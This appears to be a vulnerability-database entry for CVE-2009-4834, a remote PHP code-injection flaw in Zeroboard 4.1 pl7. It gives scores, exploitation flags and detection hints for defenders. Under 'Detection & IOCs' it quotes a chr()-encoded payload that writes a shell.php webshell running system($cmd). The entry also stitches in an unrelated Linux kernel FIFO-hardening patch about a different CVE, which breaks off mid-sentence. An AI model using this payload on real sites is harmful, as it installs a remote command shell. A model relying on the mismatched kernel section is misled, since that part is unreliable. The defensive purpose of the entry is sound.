CVE-2009-4834
Published 2010-05-04
Priority: P2 · 69 · medium · CVSS 2.0 base score 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Flags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 4.02% (89.3rd percentile)
lib.php in Zeroboard 4.1 pl7 allows remote attackers to execute arbitrary PHP code via a crafted parameter name, possibly related to now_connect.php.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| xpressengine | zeroboard | — | — |
Detection & IOCs (extracted from sources)

Quoted payload fragment from the referenced exploit report:

`command*/fputs(fopen(chr(46).chr(47).chr(115).chr(104).chr(101).chr(108).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(32).chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(36).chr(99).chr(109).chr(100).chr(41).chr(59).chr(32).chr(63).chr(62));/*&HTTP_SESSION_VARS[zb_last_connect_check]=a&HTTP_SERVER_VARS=1&HTTP_ENV_VARS=1`

Detection hints:

- The exploit targets the `preg_replace()` call in lib.php via a crafted parameter name injected through now_connect.php; look for HTTP requests to zboard.php or now_connect.php containing PHP code fragments or chr()-encoded payloads in parameter names or values.
- The exploit payload uses HTTP_SESSION_VARS, HTTP_SERVER_VARS, and HTTP_ENV_VARS as superglobal injection vectors; detect HTTP requests to zboard.php containing these parameter names alongside PHP code.
- The post-exploitation webshell is written to the /bbs/data/ directory as shell.php and accessed with a ?cmd= query parameter; monitor for creation of, or requests to, shell.php under the Zeroboard bbs/data path.
- The exploit payload is delivered as a crafted parameter name containing a preg_replace /e modifier injection wrapped in comment delimiters (*/.../*); detect URL-encoded or raw occurrences of this pattern in HTTP request parameter names targeting zboard.php.

Notes:

- The exploit targets Zeroboard version 4.1 pl7 specifically; other versions are not confirmed vulnerable by this PoC.
- The PoC exploit code references a hardcoded test target path (zboard.php?id=test); real-world exploitation requires a valid board ID parameter, so detections should not be limited to id=test.
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| NVD | 2.0 | 6.8 | MEDIUM | AV:N/AC:M/Au:N/C:P/I:P/A:P |
| VulnCheck | — | 6.8 | MEDIUM | — |
GHSA

GHSA-2qjg-hjm9-x7mg: lib (ghsa_unreviewed · 2022-05-02)
CVE-2009-4834 [MEDIUM] CWE-94
lib.php in Zeroboard 4.1 pl7 allows remote attackers to execute arbitrary PHP code via a crafted parameter name, possibly related to now_connect.php.
Kernel

namei: allow restricted O_CREAT of FIFOs and regular files (kernel_security · 2018-08-23 · CVSS 7.2)
CVE-2000-1134 [HIGH]
Disallows open of FIFOs or regular files not owned by the user in world
writable sticky directories, unless the owner is the same as that of the
directory or the file is opened without the O_CREAT flag. The purpose
is to make data spoofing attacks harder. This protection can be turned
on and off separately for FIFOs and regular files via sysctl, just like
the symlinks/hardlinks protection. This patch is based on Openwall's
"HARDEN_FIFO" feature by Solar Designer.
This is a brief list of old vulnerabilities that could have been prevented
by this feature, some of them even allow for privilege escalation:
CVE-2000-1134
CVE-2007-3852
CVE-2008-0525
CVE-2009-0416
CVE-2011-4834
CVE-2015-1838
CVE-2015-7442
CVE-2016-7489
This list is no
VulnCheck

xpressengine zeroboard Improper Control of Generation of Code ('Code Injection') (vulncheck · 2009 · CVSS 6.8)
CVE-2009-4834 [MEDIUM]
lib.php in Zeroboard 4.1 pl7 allows remote attackers to execute arbitrary PHP code via a crafted parameter name, possibly related to now_connect.php.
Affected: xpressengine zeroboard
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-alert-zeroboard-now_connect-remote-code-execution-attacks/
No detection rules found.
No writeups or analysis indexed.